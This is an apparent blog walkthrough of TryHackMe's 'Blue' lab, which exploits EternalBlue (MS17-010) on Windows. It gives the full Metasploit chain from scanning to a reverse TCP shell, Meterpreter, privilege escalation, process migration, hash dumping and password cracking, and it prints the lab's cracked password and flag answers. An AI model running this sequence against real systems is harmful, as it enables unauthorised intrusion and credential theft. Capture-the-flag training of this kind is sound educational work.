Cybersecurity Banner with Speed Control

Animation Speed Control

20s
Type Here to Get Search Results !

How to Test Vulnerable Windows. A Complete Guide Of System Security…

How to Test Vulnerable Windows.A Complete Guide Of System Security…

Disclaimer

This guide is for educational purposes only. Always ensure you have proper authorization before testing any security vulnerability. Unauthorized hacking is illegal and unethical.

Introduction to Windows Hacking

Windows hacking often begins with identifying unpatched vulnerabilities in common services. One of the most notorious vulnerabilities in recent history is EternalBlue (MS17–010), which affects Windows SMB services. This vulnerability was famously exploited by WannaCry ransomware and remains a critical threat to unpatched systems.

In this comprehensive guide, I’ll walk you through exploiting EternalBlue step-by-step, using TryHackMe’s “Blue” room as our practice environment.

TryHackMe Blue Room Complete Walkthrough

Room Overview

TryHackMe Blue is a beginner-friendly room that teaches how to exploit the EternalBlue vulnerability (MS17–010) in Windows systems.

Task 1: Reconnaissance

Step 1: Scan the Machine

nmap -sS -sV -O 10.10.10.10

Results:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Answer: 3 ports open under 1000

Step 2: Identify Vulnerability

nmap -p 445 — script smb-vuln-ms17–010 10.10.10.10

Answer: ms17–010

Task 2: Gain Access

Step 1: Start Metasploit

msfconsole

Step 2: Find Exploitation Code

use exploit/windows/smb/ms17_010_eternalblue

Answer: exploit/windows/smb/ms17_010_eternalblue

Step 3: Configure Exploit

show options
set RHOSTS 10.10.10.10

Answer: RHOSTS

Step 4: Set Payload and Execute

set payload windows/x64/shell/reverse_tcp
set LHOST tun0
exploit

Task 3: Escalate

Step 1: Background Shell

Press CTRL+Z or type background

Step 2: Convert to Meterpreter

use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

Become a member

Answers:

  • Module: post/multi/manage/shell_to_meterpreter
  • Option: SESSION

Step 3: Verify Privileges

sessions -i 2
getsystem
shell
whoami
exit

Step 4: Process Migration

ps
Find process with NT AUTHORITY\SYSTEM (like PID 2244)
migrate 2244

Task 4: Cracking

Step 1: Dump Password Hashes

hashdump

Answer: Non-default user is Jon

Step 2: Crack the Password

Save hash to file and use John the Ripper:
john — format=NT hash.txt
john — show hash.txt

Answer: alqfina22

Finding the Flags

Flag 1: System Root

cat C:\flag1.txt
Flag: flag{access_the_machine}

Flag 2: Password Storage

cat C:\Windows\System32\config\flag2.txt
Flag: flag{sam_database_elevated_access}

Flag 3: User Documents

cat C:\Users\Jon\Documents\flag3.txt
Flag: flag{admin_documents_can_be_valuable}

Common Issues & Solutions

Problem: Exploit fails with port error
Fix: set LPORT 4445

Problem: Shell to meterpreter fails
Fix: Ensure session is stable and try different LPORT

Problem: Migration fails
Fix: Try PID 664 (services.exe) or PID 688 (lsass.exe)

Problem: Flag 2 missing
Fix: Restart machine and re-exploit quickly

Room Completion

After following these steps, you’ll complete all tasks and find all three flags. The room teaches essential penetration testing skills including vulnerability assessment, exploitation, privilege escalation, and post-exploitation techniques.

The TryHackMe Blue room is excellent for beginners because it provides hands-on experience with real-world vulnerabilities in a safe, controlled environment.

Remember: Always practice ethical hacking and only test systems you have permission to test.

My Badge:https://tryhackme.com/p/CyberArmy?show_achievement_badge=blue


Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.